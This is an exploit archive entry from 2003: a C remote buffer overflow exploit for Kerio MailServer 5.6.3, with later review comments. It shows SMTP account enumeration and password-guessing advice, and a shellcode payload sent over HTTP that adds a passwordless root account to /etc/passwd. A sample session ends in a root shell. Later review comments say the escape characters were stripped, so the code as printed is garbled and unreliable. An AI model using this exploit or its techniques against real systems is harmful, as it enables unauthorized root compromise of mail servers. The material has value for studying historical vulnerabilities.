
# Title : Kerio MailServer 5.6.3 Remote Buffer Overflow Exploit
# Published : 2003-06-27
# Author : B-r00t


/* Remote Buffer Overflow Exploit for Kerio MailServer 5.6.3   */
/* ========================================= */
/*	                        By B-r00t                                  */
/*				                       */
/* In response to the Kerio Mailserver vulnerabilities              */
/* discovered by David F.Madrid.			       */
/*	                                                                       */
/* Although this exploit requires valid authentication	       */
/* details, it is possible to use 'RCPT TO' to enumerate         */
/* valid accounts 'A La Sendmail' as shown below: -	       */
/*

$ telnet 192.168.0.10 25
Trying 192.168.0.10...
Connected to 192.168.0.10.
Escape character is '^]'.
220 dhcp-185-45 Kerio MailServer 5.6.3 ESMTP ready
mail from: Br00t@host.net
250 2.1.0 Sender <Br00t@host.net> ok

rcpt to: nosuchuser@host.net
550 5.1.1 Mailbox <nosuchuser@host.net> does not exist
rcpt to:admin@host.net
250 2.1.5 Recipient <admin@host.net> ok (local) << default 
admin account.
rcpt to: fred@host.net
250 2.1.5 Recipient <fred@host.net> ok (local) << user fred 
seems to exist.

rset
250 2.0.0 Reset state
quit
221 2.0.0 SMTP closing connection
Connection closed by foreign host.

*/
/* Using a dictionary attack to obtain a large number      */
/* of accounts in conjunction with users  natural              */
/* stupidity for using easy to guess passwords should	*/
/* yield at least one valid account.		*/
/*					*/
/* Once an account has been cracked, login to the	*/
/* Kerio webmail service and record the 'userid' 	*/
/* cookie value: -				*/
/*
$ lynx 192.168.0.10
   Username: fred___________
   Password: _______________
   OK


192.168.0.10 cookie: userid=7dc1700017e708a5  Allow? (Y/N/Always/neVer)
*/
/* Accept the cookie 'Y' to ensure you are fully	*/
/* logged in to the Kerio webmail service.		*/
/*

[br00t@silvia:~] $ ./keriobaby 192.168.0.10 userid=7dc1700017e708a5

Payload: 408 / 408 bytes


Wall0p! ... !!!


If successful a UID 0 Account 'keriohacker'
has been appended to /etc/passwd. Use 'ssh'
or 'su' (if local) to get r00t! ....

[br00t@silvia:~] $ ssh -l keriohacker 192.168.0.10
Last login: Thu Jun  5 08:21:30 2003

sh-2.05# id
uid=0(root) gid=0(root) groups=0(root)
sh-2.05# tail -1 /etc/passwd
keriohacker::0:0:B-r00t~R0x~Y3r~W0rld!.:/tmp:/bin/sh
sh-2.05#

*SSH assumes: PermitRootLogin yes & PermitEmptyPasswords yes
Alternative: Recode the shellcode to add normal user!
That's All Folks ...
ENJOY!
*/


#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define DEST_PORT 80

/*
 * Entry point. Assembles a single HTTP request in `buffer` and sends it
 * to argv[1] on DEST_PORT (80). The request line is `req` followed by
 * `shellcode`, two copies of `ret` and " HTTP/1.0"; a Cookie header then
 * carries argv[2] verbatim. Exit codes 1..4 mark usage, socket, address
 * and connect/send failures; the success path falls off the end of main.
 *
 * NOTE(review): as printed here the listing does not compile: the
 * backslashes of the `\x`, `\n` and `\0` escapes appear to have been lost
 * in extraction (e.g. "x90x90..." and the empty '' character literals),
 * and the trailing comment on the `ret` line wraps onto the following
 * line as bare text. close() is also used without <unistd.h>, so it is
 * implicitly declared.
 */
int main ( int argc, char *argv[] )
{
int socketfd, bytes;            /* bytes holds send()'s ssize_t result, narrowed to int */
struct sockaddr_in dest_addr;   /* only sin_family, sin_port, sin_addr and sin_zero are set */

char buffer[700];   /* request is built here with strcpy/strcat; no bound is checked */
// char ret[] = "x07xf7x7fxbe"; // Use this if attached with GDB
// NOTE(review): the comment after `ret` below continues on the next line,
// which is then bare text outside any comment (extraction wrap).
char ret[] = "x07xf7xffxbe"; // RedHat Linux 7.2 + 
kerio-mailserver-mcafee-5.6.3-rh7.i386.rpm
char *ptr = buffer;                 /* alias of buffer, passed to send() */
char req[] = "GET /list?folder=~"; /* request path the payload is appended to */
char cr[] = "x0Dx0A";              /* CRLF header terminator (escapes lost, see above) */

/* Long run of 0x90 bytes followed by the payload proper; the "Payload:"
 * line printed below is strlen() of this array. */
char shellcode[] =
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
// Fat Bloke Shellcode to avoid HTTP chars by B-r00t..
// Appends: keriohacker::0:0:B-r00t~R0x~Y3r~W0rld!.:/tmp:/bin/sh
"xebx55x5exb0xffx2cxd0x88x06x88x46x04x88x46x34"
"x88x46x39x88x46x3dx31xc0x88x46x0bx88x46x41x66"
"xb8x0bx27x66x2dx01x27x66x89x46x40x8dx5ex0cx89"
"x5ex42xb0x05x8dx1ex66xb9x42x04x66xbaxe4x01xcd"
"x80x89xc3xb0x04x8bx4ex42x31xd2xb2xffx80xeaxca"
"xcdx80xb0x06xcdx80xb0x01x31xdbxcdx80xe8xa6xff"
"xffxffx58x65x74x63x58x70x61x73x73x77x64x58x6b"
"x65x72x69x6fx68x61x63x6bx65x72x3ax3ax30x3ax30"
"x3ax42x2dx72x30x30x74x7ex52x30x78x7ex59x33x72"
"x7ex57x30x72x6cx64x21x2ex3ax58x74x6dx70x3ax58"
"x62x69x6ex58x73x68x58x58x41x41x41x41"
"x90x90x90x90x90x90";

memset (buffer, '', sizeof (buffer));

/* Usage check happens after the arrays are declared; exit code 1. */
if (argc < 3) {
        printf("nUsage: %s [IP_ADDRESS] [COOKIE]", argv[0]);
        printf("nExample: %s 10.0.0.1 userid=771c740df0270936n", 
argv[0]);
	exit (1);
        }

/* NOTE(review): %d with a size_t (strlen) argument is a format mismatch;
 * %zu is the matching specifier. */
printf ("nPayload: %d / 408 bytesnn", strlen(shellcode));

/* NOTE(review): every piece is appended unchecked. argv[2] in particular
 * has no length limit, so a long second argument overruns the 700-byte
 * stack buffer in this program itself. */
strcpy (buffer, req);
strcat (buffer, shellcode);
strcat (buffer, ret);
strcat (buffer, ret);
strcat (buffer, " HTTP/1.0");
strcat (buffer, cr);
strcat (buffer, "Cookie: ");
strcat (buffer, argv[2]);
strcat (buffer, cr);
strcat (buffer, cr);

if ((socketfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
        perror("Socket");
        exit (1);
        }

dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(DEST_PORT);
/* inet_aton() returns 0 on a malformed address; it does not set errno,
 * so the perror() text here is only the message string. */
if (! inet_aton(argv[1], &(dest_addr.sin_addr))) {
        perror("inet_aton problems");
        exit (2);
        }

memset( &(dest_addr.sin_zero), '', 8);

if (connect (socketfd, (struct sockaddr *)&dest_addr, sizeof (struct 
sockaddr)) == -1){
        perror("connect failed");
        close (socketfd);
        exit (3);
        }


/* NOTE(review): only -1 is treated as failure; a short send() (fewer
 * than strlen(buffer) bytes) is reported as success. */
bytes = (send (socketfd, ptr, strlen(buffer), 0));
if (bytes == -1) {
        perror("send error");
        close (socketfd);
        exit(4);
        }

/* The banner below is printed unconditionally after the send; nothing
 * from the server is read, so "successful" is not verified here. */
close (socketfd);
printf ("nWall0p! ... !!!nn");
printf ("nIf successful a UID 0 Account 'keriohacker'");
printf ("nhas been appended to /etc/passwd. Use 'ssh'");
printf ("nor 'su' (if local) to get r00t! ....nn");

}
